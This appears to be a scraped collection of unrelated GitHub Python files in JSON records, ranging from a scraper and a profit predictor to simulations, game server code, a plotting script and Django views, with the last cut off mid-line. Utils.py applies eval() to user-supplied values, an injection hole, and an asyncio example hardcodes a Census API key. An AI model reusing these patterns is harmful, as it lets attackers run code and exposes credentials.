\n raw_notice_date = content.find('div', class_='date').find('p')\n day = raw_notice_date.find('span', class_='day').text\n month = raw_notice_date.text.split('/')[0].strip().replace(day, '')\n year = raw_notice_date.text.split('/')[1].strip()\n notice_date = f'{year}-{month}-{day}'\n notice_content = content.find('div', class_='entry-content').text\n tag_notice.update(\n {'type': notice_type, 'date': notice_date, 'content': notice_content})\n tag_notices.append(tag_notice)\n return tag_notices\n\n\ndef post_to_jsonbase(tag_notices):\n headers = {\n # Already added when you pass json=\n # 'content-type': 'application/json',\n }\n\n response = requests.put(\n 'https://jsonbase.com/lucas/tags', headers=headers, json=tag_notices)\n\n return response\n\ndef get_from_jsonbase():\n response = requests.get('https://jsonbase.com/lucas/tags')\n if response.status_code == 200:\n return response.json()\n\ndef send_bark(title, content):\n url = 'https://api.day.app/{}'.format(bark_key)\n\n headers = {\n 'Content-Type': 'application/json; charset=utf-8',\n }\n\n json_data = {\n 'body': content,\n 'title': title,\n }\n\n response = requests.post(url, headers=headers, json=json_data)\n\ndef compare_notices(tag_notices, old_notices):\n for notice in tag_notices:\n if notice not in old_notices:\n send_bark(notice['type'], notice['content'] + '\\n' + notice['date'])\n\ndef main():\n contents = get_tag_notice()\n tag_notices = handle_tag_notice(contents)\n old_notices = get_from_jsonbase()\n compare_notices(tag_notices, old_notices)\n response = post_to_jsonbase(tag_notices)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wanglz111/pipedream-script","sub_path":"tag_notice.py","file_name":"tag_notice.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2313969139","text":"import pickle\nimport json\nimport config\nimport numpy as np\n\nclass StartupProfit():\n \n def __init__(self, user_data):\n self.model_file_path = config.MODEL_FILE_PATH\n self.user_data = user_data\n\n def load_saved_data(self):\n with open(self.model_file_path, \"rb\") as f:\n self.model = pickle.load(f)\n\n with open(config.PROJECT_DATA_FILE_PATH, \"r\") as f:\n self.proj_data = json.load(f)\n\n def get_predicted_profit(self):\n\n self.load_saved_data()\n\n\n State = \"State_\"+self.user_data[\"State\"]\n\n State_index = self.proj_data[\"Columns\"] == State\n\n col_count = len(self.proj_data[\"Columns\"])\n test_array = np.zeros(col_count)\n test_array[0] = eval(self.user_data[\"R&D Spend\"])\n test_array[1] = eval(self.user_data[\"Administration\"])\n test_array[2] = eval(self.user_data[\"Marketing Spend\"])\n test_array[State_index] = 1\n print(test_array)\n Profit_Prediction = np.around(self.model.predict([test_array])[0],2)\n print(\"Predicted Profit :\", Profit_Prediction)\n\n return Profit_Prediction\n\nif __name__ ==\"__main__\":\n ins = StartupProfit()\n ins","repo_name":"YeshawantDighe/Startup_Profit","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74207490750","text":"import numpy as np\nfrom scipy.stats import levy_stable\nfrom math import tan, cos, pi\nimport dill\nfrom time import time\nfrom multiprocessing import Pool, cpu_count\nimport pickle as pk\nfrom scipy.io import savemat\nimport os\n\ndef make_dir(dirName):\n if not os.path.exists(dirName):\n 
os.makedirs(dirName)\n\ndef run_dill_encoded(payload):\n fun, args = dill.loads(payload)\n return fun(*args)\n\ndef apply_async(pool, fun, args):\n payload = dill.dumps((fun, args))\n return pool.apply_async(run_dill_encoded, (payload,))\n\ndef get_levy_stable(alpha, beta, delta, gamma, size_):\n return levy_stable.rvs(alpha, beta, delta, gamma, size = size_)\n\n\ndef fractional_diffusion(alpha_, beta_, theta_, D_, L, M, \n use_parallel = False, do_save = False):\n L = int(L)\n M = int(M)\n xnt = np.zeros((L, M))\n L_temp = 20*L\n tau = 1e-5\n c_alpha_ = np.power(D_*tau, 1/alpha_)\n c_beta_ = np.power(tau, 1/beta_)\n\n x_alpha_ = alpha_\n x_beta_ = - tan(theta_*pi/2) / tan(alpha_*pi/2)\n x_gamma_ = c_alpha_ * np.power(cos(theta_*pi/2), 1/alpha_)\n x_delta_ = - x_gamma_ * tan(theta_*pi/2)\n\n t_alpha_ = beta_\n t_beta_ = 1\n t_gamma_ = c_beta_ * np.power(cos(beta_*pi/2), 1/beta_)\n t_delta_ = t_gamma_ * tan(beta_*pi/2)\n M_thres = 200\n num_processes = cpu_count()\n ti = time()\n if M>M_thres:\n num_M = int(np.floor(M/M_thres))\n if use_parallel:\n pool = Pool(processes=num_processes)\n results_dt = []\n results_dx = []\n for i in range(num_M):\n results_dt.append(apply_async(pool, get_levy_stable, (t_alpha_, t_beta_, t_delta_, t_gamma_, (L_temp, M_thres))))\n results_dt = [p.get() for p in results_dt]\n dt = np.concatenate(results_dt, axis=1)\n\n for i in range(num_M):\n results_dx.append(apply_async(pool, get_levy_stable, (x_alpha_, x_beta_, x_delta_, x_gamma_, (L_temp, M_thres))))\n results_dx = [p.get() for p in results_dx]\n dx = np.concatenate(results_dx, axis=1)\n else:\n dt = np.zeros((L_temp, M))\n dx = np.zeros((L_temp, M))\n for i in range(num_M):\n dt_temp = levy_stable.rvs(t_alpha_, t_beta_, t_delta_, t_gamma_, size = (L_temp, M_thres))\n dt[:,i*M_thres:(i+1)*M_thres] = dt_temp\n\n dx_temp = levy_stable.rvs(x_alpha_, x_beta_, x_delta_, x_gamma_, size = (L_temp, M_thres))\n dx[:,i*M_thres:(i+1)*M_thres] = dx_temp\n else:\n dt = levy_stable.rvs(t_alpha_, t_beta_, t_delta_, t_gamma_, size = (L_temp, M))\n dx = levy_stable.rvs(x_alpha_, x_beta_, x_delta_, x_gamma_, size = (L_temp, M))\n\n dt_sum = np.concatenate((np.zeros((1, M)), np.cumsum(dt, axis=0)))\n dx_sum = np.concatenate((np.zeros((1, M)), np.cumsum(dx, axis=0)))\n T = np.linspace(0, np.min(dt_sum[-1,:]), L)\n\n nt = np.zeros((np.size(T), M), dtype=int)\n for i in range(M):\n jj = 0\n looping_complete = False\n for k in range(1+L_temp):\n while(True):\n if dt_sum[k,i]>=T[jj]:\n nt[jj,i] = k\n jj += 1\n if jj >= np.size(T):\n looping_complete = True\n break\n else:\n break\n if looping_complete:\n break\n for i in range(M):\n xnt[:,i] = dx_sum[nt[:,i],i]\n\n if do_save:\n data_dir_name = 'data'\n make_dir(data_dir_name)\n file_name = 'sim_frac_diff_a_%1.2f_b_%1.2f_t_%1.2f_D_%1.2f_L_%d_M_%d.p'%(alpha_, beta_, theta_, D_, L, M)\n pk.dump({'x':xnt, 'T':T}, open(os.path.join(data_dir_name, file_name), 'wb'))\n savemat(open(os.path.join(data_dir_name, file_name[:-1]+'mat'), 'wb'), {'xnt':xnt, 'T':T})\n\n return {'x':xnt, 'T':T}\n\n\nif __name__ == '__main__':\n M = 1e4\n L = 1e3\n alpha_ = 2\n beta_ = 0.5\n theta_ = 0\n D_ = 1\n trajectories = fractional_diffusion(alpha_, beta_, theta_, D_, L, M, use_parallel = True)","repo_name":"gaurav71531/fractDiffusion","sub_path":"gen_frac_diff_trajectories.py","file_name":"gen_frac_diff_trajectories.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"10228358108","text":"\"\"\"Make a 
class for the Heaviside function.\"\"\"\nfrom math import pi, sin\n\n\nclass Heaviside:\n def __init__(self, eps=0):\n self.eps = eps\n\n def __call__(self, x):\n eps = self.eps\n if eps == 0:\n if x < 0:\n return 0\n else:\n return 1\n elif eps > 0:\n if x < -eps:\n return 0\n elif -eps <= x <= eps:\n return 1/2 + x/(2*eps) + sin(pi*x/eps)/(2*pi)\n else:\n return 1\n else:\n return NotImplemented\n","repo_name":"Zhuoyue-Huang/PoP-RM","sub_path":"Chapter7-class/Ex/Heaviside_class19.py","file_name":"Heaviside_class19.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11150412093","text":"import sys\r\n\r\nif __name__ == '__main__':\r\n\r\n s = (int(x) for x in sys.stdin.read().split())\r\n\r\n procesos = next(s)\r\n tiempo = next(s)\r\n\r\n listaprocesos = []\r\n listatiempos = []\r\n\r\n for i in range(procesos):\r\n llave = next(s)\r\n valor = next(s)\r\n division = valor // tiempo\r\n if valor % tiempo != 0:\r\n listaprocesos.append(llave)\r\n listatiempos.append(division + 1)\r\n else:\r\n listaprocesos.append(llave)\r\n listatiempos.append(division)\r\n\r\n for indice in range(len(listatiempos)):\r\n minimo = min(listatiempos)\r\n indicearemover = listatiempos.index(minimo)\r\n print(listaprocesos[indicearemover])\r\n listaprocesos.pop(indicearemover)\r\n listatiempos.pop(indicearemover)\r\n","repo_name":"A01751587/Competitive-Programming","sub_path":"Concurso_28_10/Procesos.py","file_name":"Procesos.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74737372670","text":"# Ramsay: \"(...) you win if you manage to guess who I am and why I am torturing you.\"\n# Theon must think fast and guess who his tormentor is! However,\n# Ramsay has already decided what he will do after Theon gives his answer.\n# Theon can say that his tormentor is one of N people. Consider that the people are numbered from 1 to N.\n# If Theon answers that his tormentor is person i, Ramsay will hit him Ti times.\n# Your task is to help Theon determine what his answer should be so as\n# to minimize the number of times he will be hit.\nimport sys\n\nN = int(input())\npersons = [int(x) for x in sys.stdin.readline().split()]\n\nlowest_pos = 0\nfor i in range(N):\n if i == 0:\n lowest = persons[i]\n continue\n if persons[i] < lowest:\n lowest = persons[i]\n lowest_pos = i\nprint(lowest_pos + 1)","repo_name":"andersonbispos/desafios-bootcamp-dio","sub_path":"resolvendoAlgoritmosPython/respostaTheon.py","file_name":"respostaTheon.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31511234607","text":"import asyncio\nimport random\nimport requests\n\ncensus_key = 'a88b50af47f987e2e4f7b8a8178e0071fa06d360'\npop_2021 = f'https://api.census.gov/data/2021/pep/population?get=POP_2021&for=us:*&key={census_key}'\npop_2019 = f'https://api.census.gov/data/2019/pep/population?get=POP&for=us:*&key={census_key}'\npop_2017 = f'https://api.census.gov/data/2017/pep/population?get=POP&for=us:*&key={census_key}'\n\n\n# urls = [pop_2021, pop_2019, pop_2017]\n\nasync def example_using_executor():\n \"\"\"\n This seems to be the simplest and most straightforward way to do something like execute synchronous\n code (such as the requests library) inside an async function (using async/await syntax)\n \"\"\"\n loop = asyncio.get_event_loop() # 'grab a handle for event loop'\n future1 = loop.run_in_executor(None, requests.get, pop_2021) # run in the said event loop\n future2 = loop.run_in_executor(None, requests.get, pop_2019) # requests.get is our function to execute,\n future3 = loop.run_in_executor(None, requests.get, pop_2017) # pop_* is an arg to pass to the function\n\n response1 = await future1\n response2 = await future2\n response3 = await future3\n print('2021 US population', response1.json()[1][0])\n print('2019 US population', response2.json()[1][0])\n print('2017 US population', response3.json()[1][0])\n\n\nasync def io_bound_task(i):\n print(f\"start: {i}\")\n sleep_time = random.randint(0, 5)\n await asyncio.sleep(sleep_time)\n print(f\"end: {i}\")\n return i\n\n\nasync def run_multiple_tasks():\n \"\"\"\n Remember: Concurrency is a broad term that covers asynchronous and multiprocessor/parallelism\n\n To help remember asynchronous vs parallelism, asynchronous is single threaded, only one co-routine can\n occupy the thread's 'focus' at a given time. 
parallel programming uses multiple threads,\n each task is running independently, pretty straight forward :)\n \"\"\"\n my_results = []\n # If we'd like to start a number of tasks and process them as completed, we should use the following\n for f in asyncio.as_completed([io_bound_task(i) for i in range(1, 6)]):\n my_results.append(await f)\n print('my results: ', my_results) # we don't really have any guarantees on start or stop order\n\n # we could use 'await' in list comp to store the results (kinda inception-y)\n # foo = [await f for f in asyncio.as_completed([io_bound_task(i) for i in my_task_ids])]\n\n\ndef main():\n # We can run multiple async tasks from a synchronous function like so\n print('Starting the main (synchronous) function')\n asyncio.run(run_multiple_tasks())\n print('End the main (synchronous) function')\n\n\nif __name__ == \"__main__\":\n # asyncio.run(example_using_executor())\n main()\n","repo_name":"dpgraham4401/snippets","sub_path":"Python/using_asyncio.py","file_name":"using_asyncio.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4835983947","text":"from direct.directnotify import DirectNotifyGlobal\nfrom toontown.battle import DistributedBattleFinalAI\nfrom toontown.toonbase import ToontownBattleGlobals\n\nclass DistributedBattleMinibossAI(DistributedBattleFinalAI.DistributedBattleFinalAI):\n notify = DirectNotifyGlobal.directNotify.newCategory('DistributedBattleMinibossAI')\n\n def __init__(self, air, bossCog, roundCallback, finishCallback, battleSide):\n DistributedBattleFinalAI.DistributedBattleFinalAI.__init__(self, air, bossCog, roundCallback, finishCallback, battleSide)\n\n def startBattle(self, toonIds, suits):\n self.joinableFsm.request('Joinable')\n for toonId in toonIds:\n if self.addToon(toonId):\n self.activeToons.append(toonId)\n\n self.d_setMembers()\n for suit in suits:\n joined = self.suitRequestJoin(suit)\n\n self.d_setMembers()\n self.b_setState('ReservesJoining')\n\n def resume(self, joinedReserves):\n if len(joinedReserves) != 0:\n for info in joinedReserves:\n joined = self.suitRequestJoin(info)\n\n self.d_setMembers()\n self.b_setState('ReservesJoining')\n elif len(self.suits) == 0:\n battleMultiplier = ToontownBattleGlobals.getBossBattleCreditMultiplier(self.battleNumber)\n for toonId in self.activeToons:\n toon = self.getToon(toonId)\n if toon:\n recovered, notRecovered = self.air.questManager.recoverItems(toon, self.suitsKilledThisBattle, self.zoneId)\n self.toonItems[toonId][0].extend(recovered)\n self.toonItems[toonId][1].extend(notRecovered)\n\n self.d_setMembers()\n self.d_setBattleExperience()\n self.b_setState('Reward')\n else:\n if self.resumeNeedUpdate == 1:\n self.d_setMembers()\n if len(self.resumeDeadSuits) > 0 and self.resumeLastActiveSuitDied == 0 or len(self.resumeDeadToons) > 0:\n self.needAdjust = 1\n self.setState('WaitForJoin')\n self.resumeNeedUpdate = 0\n self.resumeDeadToons = []\n self.resumeDeadSuits = []\n self.resumeLastActiveSuitDied = 0","repo_name":"Lluxent/Toontown-School-House","sub_path":"toontown/battle/DistributedBattleMinibossAI.py","file_name":"DistributedBattleMinibossAI.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28951979280","text":"m= int(input())\nn= int(input())\n\na = [0,0] + [1]*(n-1)\nprimes=[]\n\nfor i in range(2,n+1):\n if a[i]:\n if i >= m:\n primes.append(i)\n for j in 
range(2*i, n+1, i):\n a[j] = 0\nif primes == []:\n print(-1)\nelse:\n print(sum(primes),primes[0], sep='\\n')","repo_name":"MONKEYZ9/algorithm","sub_path":"study/backjoon/backjoon_2581.py","file_name":"backjoon_2581.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23164185762","text":"import csv\r\nfile = open(\"main.csv\")\r\ncsvreader = csv.reader(file)\r\nheader = next(csvreader)\r\n\r\nrows = []\r\nfor row in csvreader:\r\n rows.append(row)\r\n\r\nreq=[]\r\nfor j in range(0,len(rows)):\r\n temp=[]\r\n \r\n temp.append(rows[j][0])\r\n temp.append(int(rows[j][30]))\r\n temp.append(int(rows[j][31]))\r\n \r\n req.append(temp)\r\n\r\n\r\nimport operator\r\nlis = sorted(req, key=operator.itemgetter(2, 1,0))\r\nlis.reverse()\r\n\r\nnewheader=['team','yellow cards','red cards']\r\nwith open('output.csv', 'w', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f)\r\n\r\n writer.writerow(newheader)\r\n # write multiple rows\r\n writer.writerows(lis)\r\nfile.close()\r\n","repo_name":"NaveenAare/bungeetechasignment","sub_path":"bungeetech assignment/output/answer-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36966718247","text":"import csv\nimport json\nimport re\nimport subprocess\nfrom argparse import ArgumentParser\n\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef get_args():\n parser = ArgumentParser()\n parser.add_argument('--all', action=\"store_true\", help=\"Plot all results in a single plot\")\n parser.add_argument('--per-arch', action=\"store_true\", help=\"Plot results grouped by architectures\")\n parser.add_argument('--per-objective', action=\"store_true\", help=\"Plots results grouped by objectives\")\n parser.add_argument('--per-t0-adapted', action=\"store_true\", help=\"Plots only T0 adapted models\")\n parser.add_argument('--aggregated-results', action=\"store_true\", help=\"Plots agregated results\")\n args = parser.parse_args()\n\n assert args.all or args.per_arch or args.per_objective or args.per_t0_adapted\n\n return args\n\ndef load_t0_results(csv_path):\n with open(csv_path, \"r\") as f:\n return list(csv.DictReader(f))\n\ndef load_t5x_results(dir_path: Path):\n def remove_t0_eval(filename:str):\n name = filename.replace(\"_t0_eval\", \"\")\n name = name.replace(\"_bs2048\", \"\")\n name = name.replace(\"_c4\", \"\")\n return name\n\n all_results = {}\n for child in dir_path.iterdir():\n filepath = child / \"results.json\"\n if filepath.is_file():\n with open(filepath, \"r\") as fi:\n results = json.load(fi)\n all_results[remove_t0_eval(child.name)] = results\n print(all_results.keys())\n return all_results\n\ndef get_experiment_name(filename: str):\n name = re.sub(r\"_([0-9]*)$\", r\" [\\1]\", filename)\n name = name.replace(\"span_corruption\", \"SC\")\n name = re.sub(r\"^enc_dec\", \"ED\", name)\n name = re.sub(r\"^nc_dec\", \"NCD\", name)\n name = re.sub(r\"^c_dec\", 'CD', name)\n name = name.replace(\"full_lm\", \"FLM\")\n name = name.replace(\"prefix_lm\", \"PLM\")\n name = re.sub(r\"t0_adapt_([0-9]+)\", r\"T0(\\1)\", name)\n if name[:3] == \"CD_\":\n name = re.sub(r\"lm_adapt_([0-9]+)\", r\"FLM(\\1)\", name)\n name = re.sub(r\"t0_adapt_nc_([0-9]+)\", r\"T0 AS NC (\\1)\", name)\n name = re.sub(r\"nc_sc_([0-9]+)\", r\"SC as NC(\\1)\", name)\n name = re.sub(r\"nc_t0_([0-9]+)\", 
r\"T0 as NC(\\1)\", name)\n elif name[:4] == \"NCD_\" or name[:3] == \"ED_\":\n if \"flm_adapt\" in name:\n name = re.sub(r\"flm_adapt_([0-9]+)\", r\"FLM AS CD(\\1)\", name)\n else:\n name = re.sub(r\"lm_adapt_([0-9]+)\", r\"PLM(\\1)\", name)\n else:\n raise NotImplementedError\n name = name.replace(\"_\", \" + \")\n return name\n\nTASKS = {\n 'super_glue_copa': ('COPA', 0.5),\n 'anli_r1': ('ANLI R1', 1/3),\n 'anli_r2': ('ANLI R2', 1/3),\n 'anli_r3': ('ANLI R3', 1/3),\n 'super_glue_cb': ('CB', 1/3),\n 'super_glue_rte': ('RTE', 0.5),\n 'super_glue_wsc.fixed': ('WSC', 0.5),\n 'winogrande_winogrande_xl': ('Winogrande', 0.5),\n 'super_glue_wic': ('WiC', 0.5),\n 'hellaswag': ('HellaSwag', 0.25),\n 'story_cloze_2016': ('StoryCloze', 0.5),\n}\ndef plot(t5x_data, t0_data):\n args = get_args()\n\n t5x_data, t5x_experiments = t5x_data\n assert len(TASKS) == 11\n fig, axs = plt.subplots(2, 6, figsize=(20, 8))\n axs = axs.flatten()\n\n task_min_score = {}\n task_max_score = {}\n task_median_score = {}\n for n, (task, (task_name, random_baseline)) in enumerate(TASKS.items()):\n t5lm_scores = [float(r[\"score\"]) for r in t0_data\n if r[\"runs\"] == \"xxl-lm-d4-091621\"\n and r[\"dataset_name\"] == task\n and r[\"metric_name\"] == \"accuracy (Rank)\"\n and r[\"score\"]]\n t0_scores = [float(r[\"score\"]) for r in t0_data\n if r[\"runs\"] == \"xxl-lm-d4-091621-512\"\n and r[\"dataset_name\"] == task\n and r[\"metric_name\"] == \"accuracy (Rank)\"\n and r[\"score\"]]\n t5x_scores_with_name = [\n (\n get_experiment_name(name),\n [s[\"accuracy\"] for k, s in t5x_data[name].items() if task.replace(\"anli_\", \"\") in k]\n )\n for name in t5x_experiments\n ]\n\n all_experiment_scores_with_name = [(\"T5 + LM\", t5lm_scores), (\"T0\", t0_scores), *t5x_scores_with_name]\n # Plot\n axs[n].axhline(100 * random_baseline, 0, len(all_experiment_scores_with_name), label=\"Random\")\n for i, (exp_name, scores) in enumerate(all_experiment_scores_with_name):\n axs[n].scatter([i] * len(scores), scores, s=50, alpha=0.4, label=exp_name)\n axs[n].set_title(task_name)\n\n # Gather median values\n task_min_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.min(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n task_max_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.max(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n task_median_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.median(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n\n last_ax_id = len(TASKS) - 1\n axs[last_ax_id].legend(bbox_to_anchor=(1, 1), loc=\"upper left\")\n for ax in axs[last_ax_id + 1:]:\n ax.set_visible(False)\n\n if args.aggregated_results:\n # ====== Plot agregated values =======\n fig, axs = plt.subplots(1, 3, figsize=(20, 8))\n axs = axs.flatten()\n last_ax_id=0\n experiment_names = [elt[0] for elt in next(iter(task_median_score.values()))]\n\n def plot_scores_with_name(median_score_with_name, max_score, min_score, ax, title):\n assert len(median_score_with_name) == len(max_score) and len(median_score_with_name) == len(min_score)\n ax.axhline(\n median_score_with_name[0][1],\n 0, len(median_score_with_name) - 1,\n label=median_score_with_name[0][0]\n )\n for i, ((name, median_score), max_score, min_score) in enumerate(zip(median_score_with_name[1:], max_score[1:], min_score[1:])):\n ax.errorbar(\n i, median_score, ((median_score - min_score,), (max_score - median_score,)),\n fmt=\"o\", elinewidth=1, label=name)\n 
ax.set_title(title)\n\n def get_average_normalised_score(task_scores):\n normalised_scores = []\n for scores_with_name in task_scores.values():\n random_name, random_baseline = scores_with_name[0]\n assert random_name == \"Random\"\n normalised_scores_per_task = [(scores - random_baseline) / (100 - random_baseline) for _, scores in\n scores_with_name]\n normalised_scores.append(normalised_scores_per_task)\n return np.mean(normalised_scores, axis=0)\n\n def get_average_score(task_scores):\n return np.mean(\n [[scores for _, scores in scores_with_name] for scores_with_name in task_scores.values()], axis=0)\n\n # Plot average task score\n average_task_median_score = get_average_score(task_median_score)\n assert len(experiment_names) == len(average_task_median_score)\n average_task_media_score_with_name = list(zip(experiment_names, average_task_median_score))\n del average_task_median_score\n plot_scores_with_name(\n median_score_with_name=average_task_media_score_with_name,\n max_score=get_average_score(task_max_score),\n min_score=get_average_score(task_min_score),\n ax=axs[last_ax_id],\n title=f\"Average of task median scores\"\n )\n last_ax_id += 1\n\n # Plot average of task median normalised scores `normalised_score = (score - random) / (1 - random)`\n average_task_normalised_median_score = get_average_normalised_score(task_median_score)\n assert len(experiment_names) == len(average_task_normalised_median_score)\n average_task_normalised_median_score_with_name = list(\n zip(experiment_names, average_task_normalised_median_score))\n del average_task_normalised_median_score\n plot_scores_with_name(\n median_score_with_name=average_task_normalised_median_score_with_name,\n max_score=get_average_normalised_score(task_max_score),\n min_score=get_average_normalised_score(task_min_score),\n ax=axs[last_ax_id],\n title=f\"Average of task normalised median scores\"\n )\n last_ax_id += 1\n\n axs[last_ax_id -1].legend(bbox_to_anchor=(1, 1), loc=\"upper left\")\n for ax in axs[last_ax_id:]:\n ax.set_visible(False)\n\n\ndef main():\n args = get_args()\n\n # Define directories\n results_dir = Path(__file__).resolve().parent.parent / \"results\" / \"t0_eval\"\n t0_results_dir = results_dir / \"t0\"\n t5x_results_dir = results_dir / \"t5x\"\n subprocess.run([\"mkdir\", \"-p\", t0_results_dir])\n subprocess.run([\"mkdir\", \"-p\", t5x_results_dir])\n\n # Sync previous results\n # gsutil cp gs://bigscience/experiment_d/aux_experiments/all_datasets_and_runs.csv ../results/t0_eval/t0\n if not (t0_results_dir / \"all_datasets_and_runs.csv\").exists():\n subprocess.run([\"gsutil\", \"cp\", \"gs://bigscience/experiment_d/aux_experiments/all_datasets_and_runs.csv\", t0_results_dir])\n # gsutil rsync -rd gs://bigscience-t5x/arch_objective_exps_v2/t0_eval ../results/t0_eval/t5x\n subprocess.run([\"gsutil\", \"-m\", \"rsync\", \"-rd\", \"-x\", \".*inference_eval\", \"gs://bigscience-t5x/arch_objective_exps_v2/t0_eval\", t5x_results_dir])\n\n # Load results\n t0_data = load_t0_results(t0_results_dir / \"all_datasets_and_runs.csv\")\n t5x_data = load_t5x_results(t5x_results_dir)\n\n # Plot results\n # We group experiments by:\n # - objective\n # - architecture\n LM_ADAPT_FROM = [28000, 30000, 58768]\n PRETRAIN_AND_T0_ADAPT_STEPS = [(32768, 37768), (65536, 70536), (131072, 141072), (169984, 179984), (196608, 206608)]\n def key_architecture(experiment_name):\n if experiment_name[0] == 'c':\n return 0\n elif experiment_name[0] == 'n':\n return 1\n elif experiment_name[0] == 'e':\n return 2\n else:\n raise 
NotImplementedError\n def key_objective(experiment_name):\n suffixes = []\n for max_steps,_ in PRETRAIN_AND_T0_ADAPT_STEPS:\n suffixes += [\n f\"lm_{max_steps}\",\n *[f\"{lm_type}_adapt_{lm_adapt}_{max_steps}\" for lm_adapt in LM_ADAPT_FROM for\n lm_type in [\"_lm\", \"_flm\", \"_plm\"]]\n ]\n for t0_adapt_from, max_steps in PRETRAIN_AND_T0_ADAPT_STEPS:\n suffixes += [\n f\"lm_t0_adapt_{t0_adapt_from}_{max_steps}\",\n f\"lm_t0_adapt_nc_{t0_adapt_from}_{max_steps}\",\n f\"span_corruption_t0_adapt_{t0_adapt_from}_{max_steps}\",\n *[f\"{lm_type}_adapt_{lm_adapt}_t0_adapt_{t0_adapt_from}_{max_steps}\" for lm_adapt in LM_ADAPT_FROM for\n lm_type in [\"_lm\", \"_flm\", \"_plm\"]],\n f\"-nc_sc_{t0_adapt_from}-nc_t0_{max_steps}\"\n ]\n\n for i, suffix in enumerate(suffixes):\n if experiment_name.endswith(suffix):\n return i\n raise NotImplementedError(f\"{experiment_name}\")\n\n t5x_experiments = list(t5x_data.keys())\n # Define single ordering\n t5x_experiments = sorted(t5x_experiments, key=lambda x: (key_objective(x), key_architecture(x)))\n\n if args.all:\n plot((t5x_data, t5x_experiments), t0_data)\n\n def plot_per_group(group_fn):\n t5x_objective_keys = set(group_fn(x) for x in t5x_experiments)\n for group_id in t5x_objective_keys:\n t5x_experiments_per_group = [x for x in t5x_experiments if group_id == group_fn(x)]\n plot((t5x_data, t5x_experiments_per_group), t0_data)\n if args.per_objective:\n plot_per_group(key_objective)\n if args.per_arch:\n plot_per_group(key_architecture)\n if args.per_t0_adapted:\n def key_is_t0_adapted(experiment_name):\n return \"_t0\" in experiment_name\n plot_per_group(key_is_t0_adapted)\n\n plt.show()\n print(\"Finished\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"zphang/architecture-objective","sub_path":"bigscience/scripts/plot_t5x_results_vs_t0.py","file_name":"plot_t5x_results_vs_t0.py","file_ext":"py","file_size_in_byte":12223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73131983838","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n astropy_path = sys.argv[-1]\n sys.argv = sys.argv[:-1]\n sys.path.insert(0, astropy_path)\n\n from astropy import wcs\n import numpy as np\n from distutils.core import setup, Extension\n\n if sys.platform == 'win32':\n # These are written into wcsconfig.h, but that file is not\n # used by all parts of wcslib.\n define_macros = [\n ('YY_NO_UNISTD_H', None),\n ('_CRT_SECURE_NO_WARNINGS', None),\n ('_NO_OLDNAMES', None), # for mingw32\n ('NO_OLDNAMES', None), # for mingw64\n ('__STDC__', None) # for MSVC\n ]\n else:\n define_macros = []\n\n try:\n numpy_include = np.get_include()\n except AttributeError:\n numpy_include = np.get_numpy_include()\n\n wcsapi_test_module = Extension(\n 'wcsapi_test',\n include_dirs=[\n numpy_include,\n os.path.join(wcs.get_include(), 'astropy_wcs'),\n os.path.join(wcs.get_include(), 'wcslib')\n ],\n # Use the *full* name to the c file, since we can't change the cwd\n # during testing\n sources=[str(os.path.join(os.path.dirname(__file__),\n 'wcsapi_test.c'))],\n define_macros=define_macros)\n\n setup(\n name='wcsapi_test',\n 
ext_modules=[wcsapi_test_module])\n","repo_name":"holzschu/Carnets","sub_path":"Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/wcs/tests/extension/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"51"} +{"seq_id":"29086091557","text":"from django.http import Http404, JsonResponse\nfrom django.shortcuts import render, redirect\nimport datetime as dt\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Profile, Project, Vote\nfrom django.contrib.auth.models import User\nfrom .forms import *\nfrom django.urls import reverse\nfrom rest_framework.views import APIView\nfrom .permissions import IsAdminOrReadOnly\nfrom rest_framework import status\nfrom rest_framework.response import Response\n# from .permissions import IsAdminOrReadOnly\nfrom .serializers import *\n\nimport cloudinary\nimport cloudinary.uploader\nimport cloudinary.api\n\n\n\n# Create your views here.\n@login_required(login_url=\"/accounts/login/\")\ndef home(request):\n    project=Project.objects.all()\n    \n    return render(request, 'home.html', {\"projects\": project})\n    \n#user profile\n@login_required(login_url='/accounts/login')\ndef profile(request):\n    current_user = request.user\n    profile = 